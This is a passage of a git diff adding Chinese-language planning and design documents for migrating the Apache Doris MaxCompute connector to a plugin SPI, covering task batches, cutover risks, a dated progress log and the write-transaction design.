plumbing(`MaxComputeTableSink`/`Logical`/`PhysicalMaxComputeTableSink`/`UnboundMaxComputeTableSink`/`MCInsertExecutor`/`MCInsertCommandContext`/`LogicalMaxComputeTableSinkToPhysical…Rule`/`MCTransactionManager`)+ 2 legacy 测 + **drop fe-core odps 依赖**(pom 两 `odps-sdk-*` 块)| **D** | ⏳ | 收口 P1-T02;闭包见 Batch D 设计;执行待 live 验证 | +| P4-T10 | **连接器测试基线**(仿 hudi 5 文件,JUnit5 手写替身):metadata/schema · scan-plan · predicate · **write-txn(commit golden, TBinaryProtocol)** · DDL | **E** | ⏳ | checkstyle 含 test 源、禁 static import | +| P4-T11 | **文档同步 + 开 PR**(5 步 doc-sync;含**修 PROGRESS stale「P3 PR CI中」→ 已合 `5c240dc7a34` #64143**、校正 recon §10)| **E** | ⏳ | PR title `[P4-Txx]`;本阶段 D-NNN 入 decisions-log | + +--- + +## 批次依赖 / 翻闸前置门 + +``` +A(DDL+分区, gate 关) ─┐ + ├─→ C(翻闸 T05/T06 + T06c 补 FE 分发接线, live) ─→ D(清引用+删legacy) ─→ E(测+PR) +B(写/事务, gate 关) ──┘ └─ 完成门 = live 验证全绿 +``` + +- **A、B 可并行**(均 gate 关、dormant、互不依赖);**两者全绿 + R-004 防御测过**才允许进 C(翻闸)。 +- **C 是唯一 live 切点**:翻闸瞬间 catalog→`PluginDrivenExternalCatalog`、table→`PluginDrivenExternalTable`。**⚠️ 实测([D-028]):翻闸只接通 读(SELECT)/CREATE TABLE/写(INSERT);DROP TABLE/CREATE DB/DROP DB(`metadataOps==null`,`PluginDrivenExternalCatalog` 仅 override `createTable`)+ SHOW PARTITIONS/partitions TVF(仍 legacy `instanceof MaxComputeExternalCatalog` 分发)翻闸即断**。本文原称"读/写/DDL/分区/show 全切 SPI"**不成立** —— 连接器侧方法在(A 批 parity)但 FE 分发未接 → 故补 **P4-T06c**(翻闸完整化)才达真 parity。 +- **D 在翻闸 + T06c 后**:T06c 把分发站 rewire 到 PluginDriven SPI 后,Batch D 只删残留 legacy MC 引用(instanceof 不再命中)+ 删 legacy 文件 + drop odps 依赖。 +- 每批独立 commit;守门循环:compile(慢,后台)+ checkstyle(绝对 `-f`)+ import-gate,**读真实 BUILD/MVN_EXIT/CS_EXIT 行**(坑 3)。 + +--- + +## 风险 / 开放问题 + +- **R-004(ODPS SDK classloader 隔离)**:recon §8 裁定「无明显陷阱」但建议翻闸前在插件 harness 做防御性连通测 → 编入 **P4-T06 入口门**。 +- **OQ-1(MCInsertExecutor 旁路)**:翻闸后 `InsertIntoTableCommand:563`/`InsertOverwriteTableCommand:320` 的 plugin-driven 路由是否完全不再经 `MCInsertExecutor`(→ MCInsertExecutor:64/75 cast 成死代码)?**Batch B 验证**。 +- ~~**OQ-2(write-context 填充)**~~ **✅ 已解并实现(P4-T04)**:**Approach A** — `planWrite` 在 finalizeSink 一处建 ODPS 写 session + 绑事务 + 盖 `txn_id`/`write_session_id`,无运行期注入 hook(legacy `MCInsertExecutor.beforeExec` 注入消失)。fe-core seam(D-2a)填 `PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 overwrite+静态分区。**binding 期填充(设 overwrite/静态分区进 `PluginDrivenInsertCommandContext`)仍 dormant,归 Batch C/D**(坑3);翻闸前 INSERT OVERWRITE PARTITION 静态分区不可用 = 设计意图(dormant)。 +- **OQ-3(反向引用穷举)**:本 session re-grep 得 ~19(含全部 live),但 category-C 注册站点(gson/enum/metacache 等)未穷举 → **P4-T07 入口先完整 re-grep**。 +- **OQ-4(连接器缓存层)**:✅ **已定(P4-T02)**:**不建**连接器自有 cache,分区直取 ODPS(镜像 legacy catalog `getPartitions` 直取路径;fe-core SPI meta-cache 覆盖 schema;Rule 2 不投机)。perf 回归再议。 + +--- + +## 阶段日志(倒序) + +### 2026-06-07(第 2 次,纯 recon+文档,无 commit) +- **live 验证 recon → 发现翻闸功能未完整 → 补 P4-T06c([D-028] 用户签字)**:用户问「如何做 live 验证 / 验证哪些内容」。并行 workflow recon(catalog 建法 / smoke SQL / SPI 路径映射 / build-deploy-run)+ **代码逐条核实**。**结论**:翻闸(T05/T06)只接通 读(SELECT,`PluginDrivenScanNode`)/CREATE TABLE(`PluginDrivenExternalCatalog.createTable:257`)/写(INSERT 全家,G1–G5);**DROP TABLE/CREATE DB/DROP DB(`ExternalCatalog:1004/1029/1105`,`metadataOps==null` 且 `PluginDrivenExternalCatalog` 仅 override createTable)+ SHOW PARTITIONS(`ShowPartitionsCommand:202-207` instanceof MaxComputeExternalCatalog)+ partitions TVF(`MetadataGenerator:1308-1319` instanceof)的 FE 分发从未接 SPI** → live 会红 5 项。连接器侧 P4-T01/T02 已实现这些方法但 FE 零调用方(DV-007 已记 `listPartition*` "零 live caller")。recon 还暴 Batch D §2 把这 3 分发站当 delete-branch(会坐实回归)vs RFC `:1065`/master-plan `:126` 本意 rewire 的冲突。**用户拍板「翻闸前全补接线」**:Batch D 前插 **P4-T06c**(通用 PluginDriven 分发,非 MC 专有 → 同修 jdbc/es/trino + 让 Batch D 退化为删残留;先 rewire 后删,解 §2 冲突),目标 **live 验证全绿** = 翻闸真正完成,再 Batch D。文档同步:HANDOFF(重写 + ⚠️关键发现 + live runbook)、decisions-log [D-028]、tasks/P4(T06c + 校正"全切 SPI"误述 + 验收/阻塞/批次图)、Batch D 设计(前置门 + §2 处置)。**未动代码。下一 = 实现 P4-T06c**。 + +### 2026-06-07(第 1 次) +- **P4-T06b 翻闸落地(Batch C flip 完成)+ Batch D 移除范围 recon/设计([D-027],2 决策用户签字)**:用户「开始下一步(T06b)+ 追加 fe-core 去 maxcompute jar 依赖」。**翻闸**:`CatalogFactory` `SPI_READY_TYPES += "max_compute"`(:52) + 删 `case "max_compute"`(原 :146-149) + 删 unused `MaxComputeExternalCatalog` import + 注释去 max_compute。gate 全绿(compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0/CS_EXIT=0 + import-gate 0,真实 EXIT)。**recon(并行 re-grep + 对抗验证,OQ-3 入口门满足)**:去 fe-core odps 依赖 = 删整套 legacy(**21 文件**:`datasource/maxcompute/` 10 + 写/txn plumbing 8 + 2 测)+ 清 **~30 文件 / 84 ref**(32 import + 43 dead branch)+ keep 集(image/plan/thrift compat)+ pom drop 两 `odps-sdk-*` 块;`feCoreOdpsResidualAfterDeletion`=∅;fe-core 仍 transitive 见 odps-sdk-core(fe-common 留)。镜像 trino `524097e38d3`+`c4ac2c5911d`。**2 决策**:(D-1) flip 先行、移除 + pom drop **待用户 live ODPS 验证后**做(保 flip 独立可回退);(D-2) fe-core 仅删直接 odps 声明(transitive-via-fe-common 留,用户选 Direct-only)。**2 SPI 新增登记 §20 E11**(D-026 预授)。Batch D turnkey 闭包 → [designs/P4-batchD-maxcompute-removal-design.md](./designs/P4-batchD-maxcompute-removal-design.md)。**下一 = 用户跑 `OdpsLiveConnectivityTest`(4 个 `MC_*` 环境变量)+ 手测 smoke → 绿后执行 Batch D**。 + +### 2026-06-06 +- **Batch C 翻闸设计完成 + 用户签字 [D-026](design-only,零代码)**:用户选 "Design Batch C first"。4 路 Explore re-verify recon 锚点 + 主线核读 executor/txn 生命周期 → 出 [P4-T05/T06 翻闸设计](./designs/P4-T05-T06-cutover-design.md)(verified file:line + 5 gap G1–G5 + 写生命周期顺序 + R-004 两分测 + ordered TODO)。**recon 校正**:GsonUtils 真锚 `:397`/`:472`(非 ~405/~478);`legacyLogTypeToCatalogType` 默认分支已出 `"max_compute"`(无需加 case);live executor=`PluginDrivenInsertExecutor`(现走 JDBC insert-handle 模型,对 MC `getWriteConfig`/`beginInsert`/`finishInsert` 全 throwing-default=直跑必抛);`PluginDrivenTransactionManager.begin(connectorTx):71-77` 未 `putTxnById`(G3);`UnboundConnectorTableSink` 不携静态分区(G4);legacy `MCInsertExecutor` 证 `transactionType()=MAXCOMPUTE`。**3 决策签字**:D-1 capability signal=新增 `ConnectorWriteOps.usesConnectorTransaction()` flag(MC=true,否决 writePlanProvider 代理/复用 ConnectorWriteType);D-2 两 commit、flip 末(`[P4-T06a]` 接线 dormant + `[P4-T06b]` flip);D-3 静态分区/overwrite 绑定入 cutover(避翻闸回归)。**2 SPI 新增**(default-preserving):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction`(impl 时 E11)。**下一 = 实现 T05(dormant)→ T06(live, 两 commit)**。 +- **P4-T04 写计划实现完成(Batch B 收尾,gate 关、dormant、零 live 风险)= Batch A+B 全完成**:新建 `MaxComputeWritePlanProvider implements ConnectorWritePlanProvider`,`planWrite` 走 **OQ-2 = Approach A**(finalizeSink 一处:建 ODPS Storage API 写 session→`writeSession.getId()` → `session.getCurrentTransaction()`→`MaxComputeConnectorTransaction.setWriteSession(wsid, tableId, settings)` 绑事务 → 盖 `TMaxComputeTableSink` 静态字段 + `static_partition_spec`(原样 map) + `partition_columns`(ODPS 表列) + `write_session_id` + `txn_id`(=`tx.getTransactionId()`);**无运行期注入 hook**,legacy `MCInsertExecutor.beforeExec` dance 消失)。**5 决策主线定/签字 [D-025]**:D-1 Approach A;D-2a 含 fe-core seam fill;**D-3 抽 `MaxComputeDorisConnector.getSettings()`**(关键证据:legacy catalog 单 `settings` 字段同供 scan+write,故抽出是忠实港非投机重构;scan provider :146-162 构造上移、共用);**D-4 `supportsInsert()`=true** 余最小化(`beginInsert`/`finishInsert`/`getWriteConfig` 留 throwing-default,MC sink 经 planWrite、commit 经 `ConnectorTransaction.commit()`,实际 executor 调用面待 Batch C);D-5 静态分区作 `getWriteContext()` col→val map。**fe-core seam(D-2a)**:`PluginDrivenTableSink.bindViaWritePlanProvider` 改收 `Optional`、读 `isOverwrite()`+`getStaticPartitionSpec()` 填 handle;`staticPartitionSpec` 加在 **`PluginDrivenInsertCommandContext`(非基类)**——因 `MCInsertCommandContext` 已自带 `staticPartitionSpec`+getter 且 shadow 基类 `overwrite`,加基类会成 override/shadow 缠结;plugin-driven seam 只见 `PluginDrivenInsertCommandContext`,post-migration hive/iceberg 复用同类(仍满足复用)。binding 期填充(设 overwrite/静态分区)仍 dormant,归 Batch C/D(坑3,已核 `InsertIntoTableCommand:598` 传空 ctx)。**写前 javap 核**(坑10):`TableWriteSessionBuilder.withMaxFieldSize(long)`/`.partition(PartitionSpec)`/`.overwrite(boolean)`/`.withDynamicPartitionOptions`/`.buildBatchWriteSession()` throws IOException、`DynamicPartitionOptions.createDefault()`、`PartitionSpec(String)`、`getId()`(via `Session`) 全确认;写路径 ArrowOptions = **MILLI/MILLI**(≠ scan MILLI/MICRO)。**偏差 [DV-012]**:`partition_columns` 取 `odpsTable.getSchema().getPartitionColumns()`(ODPS 列)vs legacy `targetTable.getPartitionColumns()`(fe-core Column)——源不同值同。守门全绿(`-pl :fe-connector-maxcompute,:fe-core -am` compile BUILD SUCCESS/MVN_EXIT=0、checkstyle 0、import-gate 0,真实 EXIT 核验)。单测延 **P4-T10**(planWrite golden)。**T04 不新增 SPI 面**(W1 全建)。**下一步 = Batch C 翻闸**(唯一 live 切点,前置 A+B 全绿 ✅ + R-004 防御测)。 +- **P4-T04 写计划设计定稿(用户签字,零代码)**:4 路 subagent recon(SPI 写面 / W5 接线 / legacy 写逻辑+executor 生命周期 / thrift+连接器脚手架)+ 主线核读 `PluginDrivenTableSink` → **解 OQ-2**。**executor 序** = `beginTransaction`(txn_id 译前生)→translate→`finalizeSink`/`bindDataSink(insertCtx)`→`beforeExec`→coordinator ⇒ `planWrite` 跑在 finalizeSink、txn_id 已在 + 写 session 可就地建 → **Approach A:planWrite 一处建 session+`getCurrentTransaction().setWriteSession`+盖 `txn_id`/`write_session_id`,无运行期注入 hook**。**5 决策签字**:D-1 Approach A;**D-2 含 fe-core seam fill**(`PluginDrivenTableSink.bindViaWritePlanProvider` 收 insertCtx 填 handle overwrite+静态分区;`PluginDrivenInsertCommandContext`/基类 +`staticPartitionSpec` map);D-3 抽 `connector.getSettings()`;D-4 `supportsInsert`=true+最小 no-op;D-5 静态分区编码进 `getWriteContext()`。`block_id` 不在 planWrite(运行期 T03);`partition_columns` 取 ODPS table 列(DV-012 待登)。设计 [P4-T04 doc](./designs/P4-T04-write-plan-design.md)。**实现挪下一 fresh session**(split-session 节奏,用户签字)。**T04 不新增 SPI 面**(W1 已全建)。 +- **P4-T03 连接器写/事务 SPI 完成**(Batch B 启,gate 关、dormant、零 live 风险):新建 `MaxComputeConnectorTransaction implements ConnectorTransaction`(港 legacy `MCTransaction` 写生命周期:`addCommitData` `TDeserializer(TBinaryProtocol)`→`TMCCommitData` 累积【commit 协议红线】、block 分配 CAS+上限校验、`commit` 港 `finishInsert`(restore session + `session.commit`)、rollback/close/getUpdateCnt)+ `MaxComputeConnectorMetadata.beginTransaction`,over W4 委派。**两 fork 用户签字 [D-024]**:(1) txn id 经新增 SPI `ConnectorSession.allocateTransactionId()`(fe-core `ConnectorSessionImpl` override `Env.getNextId`)分配——尊重 [D-015],补 id-less 连接器机制(E11 登记);(2) ODPS 写 session 创建挪 T04 planWrite(T03 纯事务容器,`writeSessionId`/`tableIdentifier`/`settings` 槽由 T04 填)。**偏差 [DV-011]**:block 上限 fe-core `Config`(20000)→连接器常量、`UserException`→`DorisConnectorException`(import-gate 禁 `common.*`)。**JDBC 仅半样板**(无 `ConnectorTransaction`),MC 首个有状态事务 adopter。守门全绿(fe-connector-maxcompute+fe-connector-api+fe-core compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0 + import-gate 0,真实 EXIT 核验)。**单测延至 P4-T10**(write-txn golden、TBinaryProtocol round-trip)。**下一步 = P4-T04 写计划**(planWrite 产 `TMaxComputeTableSink` + OQ-2 write-context)。 +- **P4-T02 连接器分区 listing 完成**(Batch A 收尾,gate 关、dormant、零 live 风险):`MaxComputeConnectorMetadata` impl SPI `listPartitionNames`/`listPartitions`/`listPartitionValues`,三方法均直取 `structureHelper.getPartitions(odps, db, tbl)`:names = `PartitionSpec.toString(false, true)`(镜像 legacy `MaxComputeExternalCatalog:283`/`MaxComputeExternalTable:201`);`listPartitions` filter **忽略**返全量、values 由 `PartitionSpec.keys()`/`get(k)` 抽、props=emptyMap(镜像 legacy SHOW PARTITIONS 不裁剪);`listPartitionValues` 按入参 `partitionColumns` 列序取 `spec.get(col)`。**OQ-4 定**:不建连接器自有 cache,直取 ODPS(Rule 2 不投机)。**保真说明**:legacy 双路径分歧(catalog:266 无 emptiness guard / table:200 有 `!partitionColumns.isEmpty()` guard),SPI 锚 catalog SHOW PARTITIONS 路径故**不加** guard。写前验过 ODPS `PartitionSpec` 真实 API(`Set keys()`/`String get(String)`/`toString(boolean,boolean)`,odps-sdk-commons 0.45.2-public)。守门全绿(连接器 compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0/CS_EXIT=0 + import-gate 0,真实 EXIT 核验)。**测试**:按计划延至 P4-T10 连接器测试基线(无 mockito 手写替身),T02 gate=compile+checkstyle+import(R12 不静默)。 +- **P4-T01 连接器 DDL 完成**(Batch A,gate 关、dormant、零 live 风险):`MaxComputeConnectorMetadata` impl SPI `createTable(ConnectorCreateTableRequest)` / `dropTable` / `createDatabase` / `dropDatabase`(忠实港 legacy `MaxComputeMetadataOps` 的 create/drop/validate/schema-build/lifecycle/bucket 逻辑,**消费 P0 request 而非 fe-core `CreateTableInfo`**);新增 `MCTypeMapping.toMcType(ConnectorType)` 反向类型映射(按 `PrimitiveType.toString()` 名 switch,递归 ARRAY/MAP/STRUCT,不支持类型抛 `DorisConnectorException`)。连接器 `McStructureHelper` 已含全部 ODPS 原语(`createTableCreator`/`dropTable`/`createDb`/`dropDb`),无需新建。**附带修 fe-core 共享转换器 CHAR/VARCHAR 长度丢失 [DV-010]**(用户 AskUserQuestion 签字)+ 回归测 `testCharVarcharLengthPreserved`。**保真说明**:legacy 的拒 auto-inc/aggregated 列校验无法表达(`ConnectorColumn` 无该标志,nereids 上游已拒),已丢弃。守门全绿(连接器 compile + checkstyle 0 + import-gate + fe-core `ConnectorColumnConverterTest` 9/0F0E,真实 EXIT 核验)。**坑**:守门 maven `-pl` 须用 `:fe-connector-maxcompute`(冒号=artifactId);裸名 `fe-connector-maxcompute` 被当相对路径解析 → reactor not found。 +- **设计已批准**([D-023]):用户批准 5 批 / 11 task 计划。同步跟踪文档(PROGRESS §一/§三/§四/§六/§七、decisions-log D-023、connectors/maxcompute、HANDOFF),修 PROGRESS §三 stale「P3 PR CI中」→ 已合 `5c240dc7a34`。**下一 session = Batch A**(P4-T01 DDL + P4-T02 分区,gate 关)。未动代码。 +- **设计 session**:读 HANDOFF/PROGRESS/AGENT-PLAYBOOK + maxcompute recon + 写-RFC §12;re-grep 反向引用(post-W-phase ~19,证 W-phase 灭 3 热点 txn 站);核 `MCTransaction` 面 / `TMaxComputeTableSink` / 连接器 SPI 缺口 / legacy LOC。产出本 P4 设计 + 5 批 11 task 计划。 + +--- + +## 关联 + +- Master plan:[§3.5](../00-connector-migration-master-plan.md) +- 写-RFC:[§12 P4 maxcompute](./designs/connector-write-spi-rfc.md) +- recon:[p4-maxcompute-migration-recon.md](../research/p4-maxcompute-migration-recon.md)(§1 连接器现状 / §3 反向引用 / §5 翻闸点 / §9 scope fork) +- 决策:D-021(scope=C 写 SPI 先行)/ D-022(写 SPI A/B1/C1/D/E)→ **本阶段批准时补 D-NNN「P4 = full adopter / option A」** +- 偏差:DV-009(W5 opaque-sink 实做 vs 旧措辞);P1-T02(McStructureHelper 去重 deferred → 本阶段 P4-T09 收口) +- 风险:R-004(ODPS classloader) +- 连接器:[maxcompute](../connectors/maxcompute.md) + +--- + +## 当前阻塞项 + +- **翻闸完成门([D-028] 更新)= P4-T06c 落 + live 验证全绿**: + 1. 先做 **P4-T06c**(补 DDL/SHOW PARTITIONS/partitions TVF 的 FE 分发,fe-core gate + UT 绿)。 + 2. 再 **用户跑 live 验证**:① `OdpsLiveConnectivityTest`(4 个 `MC_*` 环境变量);② 手测 smoke 11 项(SELECT / CREATE·DROP TABLE+DB / SHOW PARTITIONS / partitions TVF / INSERT / INSERT OVERWRITE [PARTITION];`partition_values` TVF 见 OQ-5)。**T06c 落后目标全绿**(此前会红 5 项)。 +- **Batch D 执行前置门**([D-027]+[D-028]):**T06c 落 + live 全绿后**执行 Batch D(清反向引用 + 删 21 legacy 文件 + drop fe-core odps 依赖)。**§2 对 `ShowPartitionsCommand`/`MetadataGenerator`/`PartitionsTableValuedFunction` 的处置随 T06c 改为"删残留 legacy MC 引用"**(PluginDriven 分支由 T06c 添加并保留)。闭包见 [Batch D 移除设计](./designs/P4-batchD-maxcompute-removal-design.md)。 diff --git a/plan-doc/tasks/designs/P4-T03-write-txn-design.md b/plan-doc/tasks/designs/P4-T03-write-txn-design.md new file mode 100644 index 00000000000000..abe8fc8bc65e80 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T03-write-txn-design.md @@ -0,0 +1,98 @@ +# P4-T03 设计 — 连接器写/事务 SPI(`ConnectorTransaction` + `beginTransaction`,gate 关 dormant) + +> 批次 B 首 task。事实底座见本文「Recon 事实」;fork 由用户签字(2026-06-06,见 §决策)。 +> 关联:[P4 计划 T03](../P4-maxcompute-migration.md)、[写 RFC §5.1/§5.3/§5.4/§6/§7](./connector-write-spi-rfc.md)、[D-015](id 连接器分配)、[D-022](写 SPI A/B1/C1)。 + +--- + +## Problem + +`max_compute` 连接器写 SPI 全缺。T03 把 legacy `MCTransaction`(fe-core `datasource/maxcompute/MCTransaction.java`,262 LOC)的**事务生命周期**港入连接器,impl SPI `ConnectorTransaction` + `ConnectorWriteOps.beginTransaction`,over W4 委派(`PluginDrivenTransactionManager.begin(connectorTx)` 已就位)。**gate 关、dormant**(`max_compute` 未进 `SPI_READY_TYPES`,executor 未接线),零 live 风险。 + +**T03 ≠ copy legacy**:handoff 标注 T03/T04 未逐行定稿。两处 fork 经 recon + 用户签字定稿(下)。 + +--- + +## Recon 事实(code-grounded) + +1. **SPI `ConnectorTransaction`**(`fe-connector-api`,不改签名):`getTransactionId()` / `commit()` / `rollback()` / `close()`(Closeable) + default `addCommitData(byte[])` / `supportsWriteBlockAllocation()` / `allocateWriteBlockRange(String,long)`【**无 checked throws**】/ `getUpdateCnt()`。 +2. **W4 桥已就位、未接线**:`PluginDrivenTransactionManager.begin(ConnectorTransaction)` 用 `connectorTx.getTransactionId()` 作 txnId,委派 commit/rollback/addCommitData/allocateWriteBlockRange/getUpdateCnt 给连接器事务(`PluginDrivenTransaction` 内类)。但 `BaseExternalTableInsertExecutor.beginTransaction()` 现仍调无参 no-op `begin()`(`Env.getNextId`);**无处调 `writeOps.beginTransaction()`**。 +3. **BE→FE 回调已泛化(W3/W6)**:`FrontendServiceImpl:3694` 经 `GlobalExternalTransactionInfoMgr.getTxnById(txn_id)` → `txn.supportsWriteBlockAllocation()`/`allocateWriteBlockRange()`(零 instanceof)。⇒ **`getTransactionId()` 必须 = sink stamp 的 Doris 全局 txn_id,且须注册进 `GlobalExternalTransactionInfoMgr`**(注册 + executor 接线 = 翻闸期,见 §dormant 边界)。 +4. **JDBC 只是半样板**:impl `ConnectorWriteOps`(no-op insert)**未** impl `ConnectorTransaction`。**MC 是首个有状态事务(block 分配)adopter**,无现成事务样板。 +5. **legacy id 分配**:`AbstractExternalTransactionManager.begin()` = fe-core `Env.getNextId()` 分配 + `putTxnById` 注册;`MCTransaction` 本身不持 id。 +6. **import-gate 红线**:连接器禁 import `org.apache.doris.(catalog|common|datasource|qe|analysis|nereids|planner)`。⇒ legacy 用的 `common.UserException`、`common.Config` **都禁**。`org.apache.doris.thrift.*`(含 `TMCCommitData`)允许(连接器 scan 侧已用)。 +7. **`DorisConnectorException extends RuntimeException`**(unchecked)。 + +--- + +## 决策(fork,用户签字 2026-06-06) + +### Fork 1 — txn id 机制 = **加 `ConnectorSession.allocateTransactionId()`(尊重 [D-015])** +- 矛盾:[D-015]「id 由连接器分配」(理由:HMS/Iceberg 有外部 id),但 MC **无外部 id 且够不到 `Env.getNextId()`**。 +- 决:给 `ConnectorSession` 加 `default long allocateTransactionId()`(default 抛 `UnsupportedOperationException`),fe-core 唯一 impl `ConnectorSessionImpl` override 回 `Env.getCurrentEnv().getNextId()`。MC `beginTransaction(session)` = `new MaxComputeConnectorTransaction(session.allocateTransactionId(), …)`。**连接器仍是 id 来源(经注入的分配器),符 D-015**;id 即 Doris 全局 id,与 sink txn_id / `GlobalExternalTransactionInfoMgr` 一致。 +- **SPI 加面** → 登记 [01-spi-extensions-rfc.md] E-编号(doc-sync 期定)。default 抛保后向兼容(test fake 不强制 impl)。 + +### Fork 2 — ODPS 写 session 创建 = **挪到 T04 planWrite** +- 写 session builder 需 overwrite/静态分区 context(= OQ-2);`planWrite` 的 `ConnectorWriteHandle` 正好带 `isOverwrite()`+`getWriteContext()`,T03 的 `beginInsert(session,handle,cols)` 不带。 +- 决:**T03 = 纯事务容器**(持 `writeSessionId`/`settings`/`tableIdentifier` 槽 + setter,由 T04 填)。`beginInsert`/`getWriteConfig`/`finishInsert`/`supportsInsert` + 写 session 创建 + `planWrite`(sink) **全归 T04**。T03 自洽、不碰 OQ-2。 + +### 确认 — dormant 边界 +- **不属 T03**(翻闸期 Batch C/接线):executor 调 `writeOps.beginTransaction()`→`begin(connectorTx)`;`GlobalExternalTransactionInfoMgr` 注册;`SPI_READY_TYPES`。否则会破 JDBC/ES 的 dormant(其 `beginTransaction` 默认抛)。 + +--- + +## legacy → T03 SPI 映射 + +| legacy `MCTransaction` | T03 `MaxComputeConnectorTransaction` | 备注 | +|---|---|---| +| `addCommitData(byte[])`(W2 已加)| `addCommitData`:`TDeserializer(TBinaryProtocol)`→`TMCCommitData`→累积 | **红线**:必 `TBinaryProtocol`(CommitDataSerializer 单点),否则 golden 红 | +| `allocateBlockIdRange` + `allocateWriteBlockRange` override | `allocateWriteBlockRange(reqSid,count)`:校验(>0 / writeSessionId 已设 / 匹配) + CAS `nextBlockId` + 上限 | `throws UserException`→`DorisConnectorException`(unchecked);上限 `Config.max_compute_write_max_block_count`(20000)→**连接器常量** `MAX_BLOCK_COUNT=20000`(坑6,记 DV)| +| `supportsWriteBlockAllocation()`=true | 同 | | +| `finishInsert()`(restore session + `session.commit(msgs)`)| **`commit()`** 内做(用槽 `writeSessionId`/`tableIdentifier`/`settings` + 累积的 `commitDataList`)| legacy `commit()` 是 no-op、活在 finishInsert;SPI 生命周期由 manager 调 `commit()`(data-flow §6 step7),故折进 `commit()`。槽由 T04 填 | +| `appendCommitMessages`(Base64+ObjectInputStream→`WriterCommitMessage`)| 私有 helper 直港 | 纯 java.io + odps-sdk,无 fe-core | +| `commit()`(no-op)| —(逻辑上移)| | +| `rollback()`(log no-op)| `rollback()` 同(session 自过期)| | +| `getUpdateCnt()`(Σ rowCount)| 同 | | +| —(legacy 无)| `getTransactionId()`→构造注入的 id;`close()`→no-op(无资源,session 自过期)| SPI 新增面 | +| `beginInsert`/`updateMCCommitData`/`getWriteSessionId` | **→ T04** | 写 session 创建归 T04 | + +--- + +## Why(设计理由) +- **commit 折进事务**:SPI manager 只调 `ConnectorTransaction.commit()`(§6 step7);commit 数据经 B1 `addCommitData` 已累积在事务内(W4 路径 `finishInsert(...,emptyList())`)。故 ODPS `session.commit` 落 `commit()` 最自然,比 legacy 拆 finishInsert 更贴 SPI。 +- **槽 + setter(非构造全参)**:`writeSessionId`/`tableIdentifier`/`settings` 是写期(T04 beginInsert/planWrite)才知的态;T03 留 `volatile` 槽 + package/public setter,T04 接线。dormant 期可编译、correct-by-design、不运行。 +- **Rule 2**:不建连接器自有 txn 注册表(fe-core `GlobalExternalTransactionInfoMgr` + W4 manager 已覆盖);不抽象单点 block 上限(常量)。 + +--- + +## Deviations / 坑(R12 不静默) +- **DV(新)**:block 上限 legacy `Config.max_compute_write_max_block_count`(fe.conf 可调,默认 20000)→ 连接器常量 `MAX_BLOCK_COUNT=20000L`(import-gate 禁 `common.Config`)。**丢可调性**(Rule 2;如需再经 `MCConnectorProperties` 暴露)。doc-sync 入 deviations-log。 +- **异常类型**:legacy `throws UserException`→`DorisConnectorException`(unchecked,SPI 面无 checked throws)。 +- **getTxnById guard**(坑4 / 红线3):W3 已修 `GlobalExternalTransactionInfoMgr.getTxnById` 抛非返 null;T03 不碰该路径(翻闸期接线注意)。 + +--- + +## Risk Analysis +- **R-commit-protocol(红线)**:`addCommitData` 必 `TBinaryProtocol`。T10 写 golden 单测(手写替身 round-trip `TSerializer(TBinaryProtocol)`→`addCommitData`→`getUpdateCnt`/commit 数据等价)守。 +- **R-dormant**:T03 全 dormant(无 live caller)。风险点是「翻闸期接线遗漏」→ 编入 Batch C 检查单(executor 接线 + 全局注册 + id 一致)。 +- **R-T04-coupling**:`commit()` 依赖 T04 填槽;T04 未落前 `commit()` 不可运行——**设计意图**,非 bug。T04 验收含「beginInsert 填 writeSessionId/tableIdentifier/settings 后 commit 通」。 + +--- + +## Test Plan +- **T03 gate**(与 T01/T02 一致,非静默跳过):连接器 compile(`-pl :fe-connector-maxcompute -am`)+ checkstyle 0 + import-gate 0。fe-core 侧 `ConnectorSession`/`ConnectorSessionImpl` 改 → fe-core compile 绿。 +- **单测延至 P4-T10**(JUnit5 手写替身,无 mockito):write-txn golden(TBinaryProtocol round-trip、block-alloc CAS/上限/mismatch、getUpdateCnt Σ)。T03 不加测(与计划一致)。 + +--- + +## Ordered TODO +1. **SPI**:`ConnectorSession` 加 `default long allocateTransactionId()`(抛 `UnsupportedOperationException`)。 +2. **fe-core**:`ConnectorSessionImpl` override `allocateTransactionId()`→`Env.getCurrentEnv().getNextId()`。 +3. **连接器**:新建 `MaxComputeConnectorTransaction implements ConnectorTransaction`: + - 构造:`long transactionId`(+ 连接器侧 commit 所需依赖入参,最小化)。 + - 字段:`final long transactionId`;`final List commitDataList`;`final AtomicLong nextBlockId`;`static final long MAX_BLOCK_COUNT=20000L`;T04 填槽 `volatile String writeSessionId` / `volatile TableIdentifier tableIdentifier` / `volatile EnvironmentSettings settings` + setter。 + - 方法:`getTransactionId` / `addCommitData`(TBinaryProtocol 红线) / `supportsWriteBlockAllocation`=true / `allocateWriteBlockRange`(DorisConnectorException) / `getUpdateCnt` / `commit`(港 finishInsert + appendCommitMessages) / `rollback`(log) / `close`(no-op)。 +4. **连接器**:`MaxComputeConnectorMetadata.beginTransaction(session)`→`new MaxComputeConnectorTransaction(session.allocateTransactionId(), …)`。 +5. **写前核实**:javap 核 odps-sdk `TableWriteSessionBuilder.withSessionId/withSettings`、`WriterCommitMessage`、`EnvironmentSettings` 真实 API(认准 commons/table-api jar,坑10)。 +6. **gate**:compile(后台)+ checkstyle + import-gate,读真实 BUILD/MVN_EXIT/CS_EXIT。 +7. **doc-sync + 独立 commit `[P4-T03]`**(用户定时机):P4 计划 T03 ⏳→✅、PROGRESS、HANDOFF、decisions(fork)、deviations(block 上限 DV)、E-编号(SPI 加面)。 diff --git a/plan-doc/tasks/designs/P4-T04-write-plan-design.md b/plan-doc/tasks/designs/P4-T04-write-plan-design.md new file mode 100644 index 00000000000000..302a11a53d7b36 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T04-write-plan-design.md @@ -0,0 +1,152 @@ +# P4-T04 设计 — 连接器写计划(`ConnectorWritePlanProvider.planWrite`,gate 关 dormant) + +> 批次 B 次 task(T03 后继)。事实底座见「Recon 事实」(4 路 subagent + 主线核读 `PluginDrivenTableSink`,2026-06-06)。 +> 关联:[P4 计划 T04](../P4-maxcompute-migration.md)、[写 RFC §5.5/§6/§7/§9](./connector-write-spi-rfc.md)、[P4-T03 设计](./P4-T03-write-txn-design.md)(T03 留的 `setWriteSession` 槽)、[DV-009](W5 planWrite layer)、OQ-2。 + +--- + +## Problem + 